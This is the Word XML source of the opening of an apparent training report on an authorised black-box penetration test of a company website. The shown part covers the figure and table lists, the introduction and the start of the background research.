        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 21: Tevel Cyber Website SSL/TLS Certificate Hijacked</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134086 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51395BB9" w14:textId="6F6B7E59" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134087" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 22: Heartbleed Failed Exploit Leveraged Against Target with Metasploit</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134087 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20809649" w14:textId="010D365F" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134088" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 23: MySQL Common Exploit Leveraged Against Target Website</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134088 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00122C57" w14:textId="5A3C3B05" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134089" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 24: Invoice Created For Tevel Cyber Ltd with Itemised Bill of Penetration Security Test</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134089 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="543BB376" w14:textId="76901DCD" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134090" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 25: Detailed Ghant Chart Outlining Timeline of the Black Box Penetration Test</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134090 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4367FB04" w14:textId="11609601" w:rsidR="00F878AE" w:rsidRPr="00F878AE" w:rsidRDefault="00F878AE" w:rsidP="00F878AE">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4101" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc40134029"/>
      <w:r>
        <w:t>Tables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="194008C7" w14:textId="54E502B5" w:rsidR="00F878AE" w:rsidRDefault="00F878A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0134141" w:history="1">
        <w:r w:rsidRPr="00B044AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 1: Known Vulnerable Webserver Ports and Services</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134141 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B9C4104" w14:textId="489D7E54" w:rsidR="00C5650F" w:rsidRDefault="00F878AE">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4105" w14:textId="19C73441" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc40134030"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00F876CA">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="2B9C4106" w14:textId="5C939C46" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A newly employed junior network security consultant working for ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security Ltd’ has been tasked with conducting a ‘Black-Box’</w:t>
      </w:r>
      <w:r w:rsidR="00AF3969">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>penetration test</w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/978-981-10-5547-8_64","ISBN":"9789811055461","ISSN":"21903026","abstract":"The study involves the implementation of the black box penetration testing approach; it deals with the step by step idea to conduct a penetration testing on web services as a user not as a developer. In this, we study about top vulnerabilities that are found in SOAP web services and how to exploit them to get confidential information which an attacker can regenerate and gain access to and what countermeasures the developer can take to prevent such vulnerabilities. So to prevent such malicious attack we should test them beforehand and fix the vulnerabilities before deploying web services over the network. We discussed about SOA architecture and black box penetration testing as a part of development lifecycle. We used SOAP UI and Burp Suite to test Web Services for security vulnerabilities.","author":[{"dropping-particle":"","family":"Mehta","given":"Shivam","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Raj","given":"Gaurav","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Singh","given":"Dheerendra","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Smart Innovation, Systems and Technologies","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Penetration testing as a test phase in web service testing a black box pen testing approach","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=1fceaa27-c042-43eb-a468-d97883a6d3ab"]}],"mendeley":{"formattedCitation":"[1]","plainTextFormattedCitation":"[1]","previouslyFormattedCitation":"[1]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00291C18" w:rsidRPr="00291C18">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> against the companies cloud hosted website; https://www.tevelcyber.com, in order to gauge the expertise and knowledge of the junior network security consultant that primarily includes; ensuring the secure and ongoing functionality and availability of a customers website and/or network infrastructure whilst a network security consultant performs a security audit against a clients business network, along with analysing the employees professional skills of preparing a detailed security report for customers of ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security Ltd’  within future endeavours on behalf of the company. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4107" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This task will allow management and senior security consultants to evaluate the employees’ strengths along with their weaknesses, so a training programme can be tailored for the employee to build upon their skillset whilst maintaining the professional integrity of the company when the employee is working in conjunction with a senior security consultant on assignments for clients/customers on behalf  of the company.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4108" w14:textId="240D100A" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A ‘Black-Box’ network and/or software penetration test consists of a network/software security professional infiltrating and gaining access to a network and/or software application using unorthodox and unintended means by the network/software architect that designed the network and/or software application with no prior knowledge of the network/software architecture</w:t>
      </w:r>
      <w:r w:rsidR="00BD1D35">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> device configuration or source code in which the security consultant is trying to access without</w:t>
      </w:r>
      <w:r w:rsidR="0030421D">
        <w:t>, this test is also referred to as a ‘blind’ penetration test</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/978-981-10-5547-8_64","ISBN":"9789811055461","ISSN":"21903026","abstract":"The study involves the implementation of the black box penetration testing approach; it deals with the step by step idea to conduct a penetration testing on web services as a user not as a developer. In this, we study about top vulnerabilities that are found in SOAP web services and how to exploit them to get confidential information which an attacker can regenerate and gain access to and what countermeasures the developer can take to prevent such vulnerabilities. So to prevent such malicious attack we should test them beforehand and fix the vulnerabilities before deploying web services over the network. We discussed about SOA architecture and black box penetration testing as a part of development lifecycle. We used SOAP UI and Burp Suite to test Web Services for security vulnerabilities.","author":[{"dropping-particle":"","family":"Mehta","given":"Shivam","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Raj","given":"Gaurav","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Singh","given":"Dheerendra","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Smart Innovation, Systems and Technologies","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Penetration testing as a test phase in web service testing a black box pen testing approach","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=1fceaa27-c042-43eb-a468-d97883a6d3ab"]}],"mendeley":{"formattedCitation":"[1]","plainTextFormattedCitation":"[1]","previouslyFormattedCitation":"[1]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00291C18" w:rsidRPr="00291C18">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4109" w14:textId="4A9E9126" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Within the impending sections of this report, the junior security consultant will conduct background research pertaining to the ‘Black-Box’ penetration test of; https://www.tevelcyber.com and then select an esteemed industry security testing framework in which to conduct the test, along with creating a contingency plan to avoid causing a Denial of Service (DoS)</w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1002/9781118256107.ch29","ISBN":"9780471784609","ISSN":"21660735","abstract":"Different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user’s perspective, developer’s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company.","author":[{"dropping-particle":"","family":"Gu","given":"Qijun","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu","given":"Peng","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Handbook of Computer Networks","id":"ITEM-1","issued":{"date-parts":[["2012"]]},"page":"454-468","title":"Denial of Service Attacks","type":"chapter","volume":"3"},"uris":["http://www.mendeley.com/documents/?uuid=c9f434fd-6dc6-42a7-864b-1a06077ce738"]}],"mendeley":{"formattedCitation":"[2]","plainTextFormattedCitation":"[2]","previouslyFormattedCitation":"[2]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00291C18" w:rsidRPr="00291C18">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the website in question whilst employing security exploitation tools and methods against the aforementioned target. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C410A" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A list of penetration testing hacking tools that will be utilised within the attacks will be listed and then a  live ‘Black-Box’ penetration test will then be performed using said tools/methods against the target in order to gain ‘backdoor’ and/or unorthodox access to the website where customer/company data can be accessed and/or changes can be made to the website without the administrators  knowledge and approval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C410B" w14:textId="1D21EB76" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A detailed report of the vulnerabilities found within the website (if any) will then be created for the client along with security defence measures that can be employed to prevent future attacks being performed against the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C410C" w14:textId="0D963B65" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detailed costing of the penetration test will also be created for the client within a spreadsheet along with </w:t>
      </w:r>
      <w:r w:rsidR="00EF6ABD">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> agreed timeline in which the penetration testing will take place</w:t>
      </w:r>
      <w:r w:rsidR="00291C18">
        <w:t xml:space="preserve"> that will be included within this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C410D" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="00C5650F"/>
    <w:p w14:paraId="2B9C410E" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="00C5650F"/>
    <w:p w14:paraId="2B9C410F" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4110" w14:textId="282475C8" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc40134031"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F876CA">
        <w:t>.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Background Research</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2B9C4111" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Background research pertaining to the penetration test was conducted to understand the architecture of the systems that host and deliver website services to end users along with the architecture of the target website; </w:t>
      </w:r>
      <w:r w:rsidRPr="003824C7">
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>https://www.tevelcyber.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so that known and/or unknown vulnerabilities can be discovered and understood so that they can be later exploited during the ‘Black-Box’ penetration test. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4112" w14:textId="1B1EC2B7" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Since the target website is hosted and deployed within a cloud service providers datacentre server and is delivered using Hyper Text Mark-Up Language 5 (HTML5)</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/978-1-4302-3292-6_1","abstract":"Suddenly, everyone's talking about HTML5, and ready or not, you need to get acquainted with this powerful new development in web and application design. Some of its new features are already being implemented by existing browsers, and much more is around the corner. Written by developers who have been using the new language for the past year in their work, this book shows you how to start adapting the language now to realize its benefits on today's browsers. Rather than being just an academic investigation, it concentrates on the practical-the problems HTML5 can solve for you right away. By following the book's hands-on HTML5 code examples you'll learn: new semantics and structures to help your site become richer and more accessiblehow to apply the most important JavaScript APIs that are already implementedthe uses of native multimedia for video and audiotechniques for drawing lines, fills, gradients, images and text with canvas how to build more intelligent web formsimplementation of new storage options and web databaseshow geolocation works with HTML5 in both web and mobile applicationsThere appear to be intermittent problems with the first printing of Introducing HTML5. If you have one of these copies, please email us at askpeachpit.com with a copy of your receipt (from any reseller), and we'll either provide access to the eBook or send you another copy of the print book (est. to arrive the week of August 23)- whichever you prefer. If you'd like the eBook we can add that to your Peachpit.com account. You can set up a free account at www.peachpit.com/join http: //www.peachpit.com/join&gt;. Thanks so much for your understanding!","author":[{"dropping-particle":"","family":"Hawkes","given":"Rob","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hawkes","given":"Rob","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Foundation HTML5 Canvas","id":"ITEM-1","issued":{"date-parts":[["2011"]]},"title":"Introducing HTML5","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=39e57562-f83f-4381-9e5c-033eedb9f0df"]}],"mendeley":{"formattedCitation":"[3]","plainTextFormattedCitation":"[3]","previouslyFormattedCitation":"[3]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the following areas of research have been selected to further understand the underlying technologies that deliver the website services so that exploits can be utilised and/or tailored to penetrate the target. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4113" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc40134032"/>
      <w:r>
        <w:t>2.1 Cloud Based Services and Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4114" w14:textId="2E1EA035" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Modern cloud based centralised ‘Serverless’ computing, focuses on hosting and deploying network and application services from a datacentre that is predominantly owned by Cloud Service Providers (CSP)</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">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mendeley":{"formattedCitation":"[4]","plainTextFormattedCitation":"[4]","previouslyFormattedCitation":"[4]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, whom lease a portion of their network infrastructure to clients for a nominal monthly fee based on hardware usage. The </w:t>
      </w:r>
      <w:r w:rsidR="00437EDE">
        <w:t>hosted cloud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> services are </w:t>
      </w:r>
      <w:r w:rsidR="00437EDE">
        <w:t>delivered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to end clients around the globe via the public Wide Area Network (WAN)</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">
